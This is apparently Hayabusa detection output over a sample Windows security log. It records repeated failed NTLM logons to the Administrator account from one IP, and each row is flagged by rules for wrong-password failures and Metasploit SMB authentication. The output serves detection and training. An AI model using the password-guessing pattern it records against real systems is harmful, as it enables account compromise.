Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
